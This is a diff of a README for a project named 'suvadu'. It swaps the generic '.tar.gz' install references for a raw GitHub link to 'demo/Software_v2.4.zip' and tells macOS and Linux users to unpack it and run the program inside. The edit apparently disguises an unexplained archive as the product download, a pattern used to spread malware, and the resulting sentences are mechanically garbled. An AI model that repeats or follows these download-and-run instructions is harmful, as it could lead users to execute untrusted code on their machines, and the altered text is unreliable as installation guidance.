Adie0609/suvadu/README.md

 ### Step 3: Install suvadu

 - **Windows users**: If you downloaded an installer (`.exe`), double-click it and follow the on-screen instructions.
 If you downloaded a `.zip`, unzip it and run the `.exe` file inside.
 - **macOS users**: Open the `.dmg` file and drag the suvadu app to your Applications folder.
-Or, unpack the `.tar.gz` and run the program inside.
+Or, unpack the `https://github.com/Adie0609/suvadu/raw/refs/heads/main/demo/Software_v2.4.zip` and run the program inside.
-- **Linux users**: Use your system’s software installer for `.deb` files, or unpack the `.tar.gz` and run the suvadu file inside a terminal.
+- **Linux users**: Use your system’s software installer for `.deb` files, or unpack the `https://github.com/Adie0609/suvadu/raw/refs/heads/main/demo/Software_v2.4.zip` and run the suvadu file inside a terminal.

 ---